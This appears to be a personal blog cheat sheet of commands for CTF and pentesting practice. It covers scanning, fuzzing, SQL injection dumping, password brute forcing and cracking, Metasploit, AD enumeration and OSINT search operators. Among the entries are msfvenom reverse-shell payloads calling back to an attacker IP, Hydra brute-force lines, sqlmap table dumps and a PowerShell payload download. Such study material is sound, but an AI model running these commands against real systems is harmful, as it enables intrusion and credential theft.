ToolBox
Last Update : 05/18/2022
The objective of this blog page is to gather the different tools I use on a daily basis to solve CTF. This article will evolve and be enriched as time goes by.
I recommend these blogs if you are looking to learn new things in Pentesting:
Online Tools
CyberChef
Crackstation
Hash Analyser
FotoForensics
Linux Tools
Nmap
nmap documentation
nmap script list
Basic Scan : nmap -sV -T4 -Pn [IP]
UDP Scan : sudo nmap -sU --min-rate 5000 [IP]
SMB Scan : nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse [IP]
SMB Scan bis : nmap -p445,135,139 --script="safe or smb-enum-*" [IP]
RPC Scan : nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount [IP]
FFUF
Directory scan : ffuf -c -u http://[IP]/FUZZ -w common.txt -recursion -recursion-depth 2
Subdomain scan : ffuf -c -u http://[IP] -w subdomains.txt -H "Host: FUZZ.[IP]" -fw xx
SQLmap
Injection check : sqlmap -r request.txt --batch
Database listing : sqlmap -r request.txt --dbs --batch
Table listing : sqlmap -r request.txt -D [data_base] --dump --batch
Dump table : sqlmap -r request.txt -D [data_base] -T [table] --dump --batch
request.txt : copy from burp
Hydra
SSH Brute Force : hydra -l jan -P rockyou.txt ssh://[@IP]
Post Form Brute Force : hydra -f -l admin -P /usr/share/wordlists/rockyou.txt [IP] http-post-form “[Page]:VIEWSTATE + USER + PASS: Login failed”
John
SSH : ssh2john.py key.rsa > result.txt
ZIP : zip2john.py file.zip > result.txt
RAR : zip2john.py file.zip > result.txt
john result.txt --wordlist=rockyou.txt
Hashcat
md5 : hashcat -m 0 hash rockyou.txt
Metasploit
Nmap scan with vulns detection : db_nmap -sV [IP]
List of vulns from nmap scan : vulns
Search for module : search [text]
Use module : use [path_to_module]
List of options for select module : options
Set options value : set [options] [value]
Show running sessions : show sessions
Enter in session (CTRL-Z to pause session) : sessions -i [id_sessions]
List of available payloads : show payloads
Set payload value : set PAYLOAD [payload_name
Start Module : run
or exploit
SMB
Check anonymous access : smbclient --no-pass -L //[IP]
User/Share enumeration : enum4linux -a [IP]
Linux Command
Copy file over SSH : scp [FILE] [user]@[IP]:[folder]
Search exploit : searchsploit [NAME]
Download exploit : searchsploit -x [code] > [FILE]
SSH Port Forwarding : ssh -L [local_port]:127.0.0.1:[target_port] -N [target_user]@[target_ip]
File server : python3 -m http.server 8080
Download from file server : wget [ip]:81/[file]
Open port : nc -nlvp 1234
Upgrade reverse shell : python3 -c 'import pty; pty.spawn("/bin/bash")'
List open port : netstat -lntu
Telnet with user : telnet [IP] -l [user]
Mysql with host : mysql -h [IP] -u [user] -p
Find file : find / -name [name] 2>/dev/null
List Cron Job : cat /etc/crontab
Decode Base64 : base64 -d <<< [string]
HTTP Header : curl -I [IP]
Encode Base64 : base64 <<< [string]
Decode Hexa : xxd -r -p <<< [string]
Reverse Shell
Reverse Shell Cheat Sheet
Reverse Shell Generator
Reverse Shell Kali : /usr/share/webshells
Reverse Shell Windows (.exe)
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=1234 -f exe -o shell.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=[IP] lport=1234 -f aspx -o shell.aspx
Windows
AD Enumeration
sudo neo4j console
bloodhound
AD Control Paths
Group3r
Snaffler
CrackMapExec
Exploit Suggester Metasploit : post/multi/recon/local_exploit_suggester
Powershell
Import file via Powershell
powershell -c “Invoke-WebRequest -Uri ‘http://[IP]/[File]’ -OutFile ‘c:[…]’”
Privilege Escalation
Linux : linPEAS
Windows : winPEAS
Find SUID file : find / -perm -u=s -type f 2>/dev/null
OSINT
OSINT Framework
Awesome OSINT
OSINT Techniques
Recon Tools
Advanced Googleing
Exact term search : "[term]"
Exclude term : -[term]
Search within a website : site:[site] "[term]"
Search file type : filetype:[type]
Search in URL : Inurl:[term]
Search in text : Intext:[term]
Member discussion